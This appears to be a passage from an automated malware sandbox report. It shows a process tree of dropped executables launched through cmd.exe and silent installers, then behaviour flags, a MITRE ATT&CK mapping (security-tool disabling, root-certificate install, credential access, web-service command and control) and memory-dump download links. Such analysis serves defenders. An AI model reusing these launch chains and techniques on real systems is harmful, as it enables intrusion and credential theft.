        C:\Users\Admin\AppData\Local\Temp\7zS4925FE76\Tue165edc47615.exe
        5⤵
        
        PID:2712
    - - C:\Users\Admin\AppData\Local\Temp\7zS4925FE76\Tue165edc47615.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4925FE76\Tue165edc47615.exe
        5⤵
        
        PID:2964
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Tue166ff30c98d.exe
    3⤵
    - Loads dropped DLL
    PID:568
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Tue16348e27700cd15c.exe
    3⤵
    PID:952
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Tue168e957580fbc2.exe
    3⤵
    - Loads dropped DLL
    PID:1960
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Tue1628cd68fb2319b0.exe
    3⤵
    - Loads dropped DLL
    PID:1908
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Tue16d47340279.exe
    3⤵
    - Loads dropped DLL
    PID:1016
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 368 -s 476
    3⤵
    - Loads dropped DLL
    - Program crash
    PID:1984

C:\Users\Admin\AppData\Local\Temp\7zS4925FE76\Tue1628cd68fb2319b0.exe
Tue1628cd68fb2319b0.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1576
- C:\Users\Admin\AppData\Local\Temp\is-IDKP0.tmp\Tue1628cd68fb2319b0.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-IDKP0.tmp\Tue1628cd68fb2319b0.tmp" /SL5="$60126,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS4925FE76\Tue1628cd68fb2319b0.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:820
- - C:\Users\Admin\AppData\Local\Temp\7zS4925FE76\Tue1628cd68fb2319b0.exe
    "C:\Users\Admin\AppData\Local\Temp\7zS4925FE76\Tue1628cd68fb2319b0.exe" /SILENT
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:1804
  - - C:\Users\Admin\AppData\Local\Temp\is-AOE08.tmp\Tue1628cd68fb2319b0.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-AOE08.tmp\Tue1628cd68fb2319b0.tmp" /SL5="$70126,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS4925FE76\Tue1628cd68fb2319b0.exe" /SILENT
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:804

C:\Users\Admin\AppData\Local\Temp\7zS4925FE76\Tue168e957580fbc2.exe
Tue168e957580fbc2.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1636

C:\Users\Admin\AppData\Local\Temp\7zS4925FE76\Tue166ff30c98d.exe
Tue166ff30c98d.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1828

C:\Users\Admin\AppData\Local\Temp\7zS4925FE76\Tue16d47340279.exe
Tue16d47340279.exe
1⤵
- Executes dropped EXE
PID:1932

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

Install Root Certificate

T1130

Modify Registry

T1112

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/268-232-0x0000000004230000-0x000000000437C000-memory.dmp

Filesize
1.3MB

Download
memory/368-82-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/368-84-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/368-83-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/368-86-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/368-87-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/368-89-0x000000006B280000-0x000000006B2A6000-memory.dmp

Filesize
152KB

Download
memory/368-88-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/368-85-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/368-77-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/368-81-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/368-80-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/368-79-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/368-78-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/368-76-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/368-90-0x000000006B280000-0x000000006B2A6000-memory.dmp

Filesize
152KB

Download
memory/660-55-0x0000000075C21000-0x0000000075C23000-memory.dmp

Filesize
8KB

Download
memory/804-214-0x0000000000260000-0x0000000000261000-memory.dmp

Filesize
4KB

Download
memory/820-199-0x00000000001F0000-0x00000000001F1000-memory.dmp

Filesize
4KB

Download
memory/892-235-0x0000000004C90000-0x0000000004C91000-memory.dmp

Filesize
4KB

Download
memory/892-217-0x0000000000B90000-0x0000000000B91000-memory.dmp

Filesize
4KB

Download
memory/1036-236-0x0000000004C30000-0x0000000004C31000-memory.dmp

Filesize
4KB

Download
memory/1036-219-0x0000000001330000-0x0000000001331000-memory.dmp

Filesize
4KB

Download
memory/1056-207-0x0000000000400000-0x00000000016FB000-memory.dmp

Filesize
19.0MB

Download
memory/1056-196-0x0000000001850000-0x000000000189E000-memory.dmp

Filesize
312KB

Download
memory/1056-200-0x0000000000350000-0x00000000003DE000-memory.dmp

Filesize
568KB

Download
memory/1272-223-0x0000000003C90000-0x0000000003CA6000-memory.dmp

Filesize
88KB

Download
memory/1284-234-0x00000000039F0000-0x0000000003BB4000-memory.dmp

Filesize
1.8MB

Download
memory/1576-195-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/1636-218-0x0000000000200000-0x0000000000201000-memory.dmp

Filesize
4KB

Download
memory/1636-231-0x0000000000240000-0x0000000000241000-memory.dmp

Filesize
4KB

Download
memory/1636-240-0x0000000004870000-0x0000000004871000-memory.dmp

Filesize
4KB

Download
memory/1704-213-0x0000000000400000-0x0000000002F29000-memory.dmp

Filesize
43.2MB

Download
memory/1704-212-0x0000000000290000-0x00000000002D9000-memory.dmp

Filesize
292KB

Download
memory/1704-194-0x0000000000320000-0x0000000000349000-memory.dmp

Filesize
164KB

Download
memory/1756-202-0x0000000000640000-0x0000000000735000-memory.dmp

Filesize
980KB

Download
memory/1804-210-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/1816-233-0x0000000002330000-0x0000000002F7A000-memory.dmp

Filesize
12.3MB

Download
memory/1816-229-0x0000000002330000-0x0000000002F7A000-memory.dmp

Filesize
12.3MB

Download
memory/1816-239-0x0000000002330000-0x0000000002F7A000-memory.dmp

Filesize
12.3MB

Download
memory/1828-211-0x0000000000400000-0x0000000002F09000-memory.dmp

Filesize
43.0MB

Download
memory/1828-193-0x0000000003040000-0x0000000003049000-memory.dmp

Filesize
36KB

Download
memory/1828-209-0x0000000000240000-0x0000000000249000-memory.dmp

Filesize
36KB

Download
memory/1932-224-0x00000000011D0000-0x00000000011D1000-memory.dmp

Filesize
4KB

Download
memory/2704-247-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/2704-249-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/2704-250-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/2704-246-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/2704-245-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/2768-243-0x0000000000E90000-0x0000000000E91000-memory.dmp

Filesize
4KB

Download
memory/2864-261-0x00000000002B0000-0x00000000002B1000-memory.dmp

Filesize
4KB

Download